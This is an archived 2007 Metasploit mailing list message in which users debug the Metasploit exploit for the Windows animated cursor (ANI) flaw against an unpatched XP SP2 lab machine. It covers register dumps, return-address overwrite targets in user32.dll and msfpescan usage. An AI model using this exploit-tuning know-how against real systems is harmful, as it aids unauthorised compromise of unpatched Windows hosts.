Metasploit mailing list archives
Metasploit vs ANI
From: thomas.werth at vahle.de (Thomas Werth)
Date: Wed, 04 Apr 2007 09:35:10 +0200
In Process Mem 0x769FC81A is a MOV ECX,DWORD PTR SS:[EBP-1D8] user32.dll has no adress of 0x769fc81a, it is starting with 0x77 ... Machine is semi patched ( even less then more , how should i test on this machine when being patched ) . How can i use msfpescan to find an ebx+4 in user32.dll ? ./msfpescan -j ebx+4 /path/to/user32.dll raises ( no surprise) syntax error, ./msfpescan -j ebx /path/to/user32.dll just lists ebx calls- mmiller at hick.org schrieb:
Yeah, your machine has an older version of user32.dll. With that said, if you're using the Automatic target, it should also try to trigger the vulnerability using a complete overwrite of the return address with 0x769fc81a. What do you get when you disassemble this address? If it's something other than a call [ebx+4], then that will explain why it's failing to hit in both cases. Is the machine you're testing against using the latest patches (aside from the latest ANI patch)? On Wed, Apr 04, 2007 at 08:59:46AM +0200, Thomas Werth wrote:user32.dll is version 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) instruction in user32.dll around 0x77d525ba looks like this 77D525B3 mov ebx, [esi+0DCh] 77D525B9 test ebx, ebx 77D525BB mov [ebp+arg_0], eax seems like this user32.dll doesn't find to what metasploit opcode db prints out . mmiller at hick.org schrieb:What version of user32.dll do you have? What is the instruction at 77d525ba? The partial overwrite is succeeding, but it appears you have something other than a call [ebx+4] at this location. On Wed, Apr 04, 2007 at 08:26:44AM +0200, Thomas Werth wrote:ok here are details msf 3 latested updates running on bt2 hd install. Using win/shell/bind_tcp payload Test vmware windows xp sp2 german no ani patch installed, running as admin . Using ollydgb on ie . WinXp connects to given msf random uri as soon as msf shows ready signals. Ollydg is catching on error : EAX ED40601B ECX 7C92056D ntdll.7C92056D EDX 00000000 EBX 0012DF80 ESP 0012DECC EBP FED47515 ESI 0012DEFC ASCII "anih$" EDI 0012DECC EIP 77D525BA USER32.77D525BA C 0 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 1 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDF000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_INVALID_PARAMETER (00000057) EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty -??? FFFF 0084837B 6B84837B ST1 empty -??? FFFF 00000000 6B000000 ST2 empty -??? FFFF 00000084 0083007B ST3 empty -??? FFFF 00000084 0083007B ST4 empty -??? FFFF 6B84837B 6B84837B ST5 empty -??? FFFF 00000084 0083007B ST6 empty 1.0000000000000000000 ST7 empty 1.0000000000000000000 3 2 1 0 E S P U O Z D I FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1--
Current thread:
- Metasploit vs ANI, (continued)
- Metasploit vs ANI Nicolas RUFF (Apr 02)
- Metasploit vs ANI mmiller at hick.org (Apr 02)
- Metasploit vs ANI H D Moore (Apr 02)
- Metasploit vs ANI Giorgio Casali (Apr 03)
- Metasploit vs ANI Thomas Werth (Apr 03)
- Metasploit vs ANI mmiller at hick.org (Apr 03)
- Metasploit vs ANI Thomas Werth (Apr 03)
- Metasploit vs ANI mmiller at hick.org (Apr 03)
- Metasploit vs ANI Thomas Werth (Apr 03)
- Metasploit vs ANI mmiller at hick.org (Apr 04)
- Metasploit vs ANI Thomas Werth (Apr 04)
- Metasploit vs ANI H D Moore (Apr 04)
- Metasploit vs ANI H D Moore (Apr 04)
- Metasploit vs ANI Fabrice MOURRON (Apr 04)
- Metasploit vs ANI security (Apr 05)
- Metasploit vs ANI Jerome Athias (Apr 05)
- Metasploit vs ANI security (Apr 05)
- Metasploit vs ANI Thomas Werth (Apr 11)
- Metasploit vs ANI Donnie Werner (Apr 05)
- Metasploit vs ANI Jerome Athias (Apr 04)
- Metasploit vs ANI Jerome Athias (Apr 04)